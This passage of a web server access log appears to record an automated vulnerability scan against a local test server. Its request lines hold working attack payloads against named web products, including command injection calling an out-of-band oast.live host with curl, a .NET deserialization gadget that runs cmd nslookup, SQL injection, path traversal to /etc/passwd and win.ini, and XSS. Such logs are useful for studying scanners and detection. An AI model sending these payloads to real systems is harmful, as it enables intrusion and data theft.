Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"{\x22command\x22:\x22setWanPortSt\x22,\x22proto\x22:\x22dhcp\x22,\x22port\x22:\x224\x22,\x22vlan_tagged\x22:\x221\x22,\x22vlanid\x22:\x225\x22,\x22mtu\x22:\x22; curl ca28fg0smpvbd3qg07h0j6e6pkwk84sck.oast.live;\x22,\x22data\x22:\x22hi\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ztp/cgi-bin/handler HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test\x22) and extractvalue(1,concat(0x7e,md5(1234567890))) -- a HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=my-sticky-elements-leads&search-contact=xxxx%22%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29+x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/arforms/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /client/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-ui/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"user=rootxx&pam=&old=test|cat /etc/passwd&new1=test2&new2=test2&expired=2","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /password_change.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /JavaScriptServlet HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /objects/getImageMP4.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(4)))HQYx) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/tests.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xprober.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /compress.php?file=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5(202072102)))),@`%27` HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mobile/plugin/SyncUserInfo.jsp?userIdentifiers=-1)union(select(3),null,null,null,null,null,str(98989*44313),null HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /prometheus HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webalizer/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /files/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/apidocs/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"\x0D\x0A\x0D\x0A \x0D\x0A foo\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 2\x0D\x0A \x0D\x0A <_comparison z:Id=\x224\x22 z:FactoryType=\x22a:DelegateSerializationHolder\x22 z:Type=\x22System.DelegateSerializationHolder\x22 z:Assembly=\x220\x22\x0D\x0A xmlns=\x22http://schemas.datacontract.org/2004/07/System.Collections.Generic\x22\x0D\x0A xmlns:a=\x22http://schemas.datacontract.org/2004/07/System\x22>\x0D\x0A \x0D\x0A mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A Compare\x0D\x0A \x0D\x0A \x0D\x0A System.String\x0D\x0A System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\x0D\x0A \x0D\x0A Start\x0D\x0A \x0D\x0A System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\x0D\x0A System.Diagnostics.Process\x0D\x0A System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A System.Diagnostics.Process Start(System.String, System.String)\x0D\x0A System.Diagnostics.Process Start(System.String, System.String)\x0D\x0A 8\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A Int32 Compare(System.String, System.String)\x0D\x0A System.Int32 Compare(System.String, System.String)\x0D\x0A 8\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 2\x0D\x0A \x0D\x0A /c nslookup ca28fg0smpvbd3qg07h0w8pajswcimdkp.oast.live\x0D\x0A cmd\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"action=ucmm_mc_api&apiKey=-ca28fg0smpvbd3qg07h056e6p7gkzdje5.oast.live%2Ftest%2Ftest%2Ftest%3Fkey1%3Dval1%26dummy%3D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /objects/getSpiritsFromVideo.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/tests.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/subscriptions HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_debug_toolbar/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CMSPages/logon.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirect:http://www.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=aaa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"aps=ca28fg0smpvbd3qg07h0wc6riqgi43rix.oast.live&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /AdminTools/querybuilder/logon?framework= HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"email=springbird@qq.com&password=springbird&remeber=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/prometheus HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /htmlcode/html/indexdefault.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /icons/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fed.rpc.solo.io.GlooInstanceApi/ListClusterDetails HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1/admin/", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) 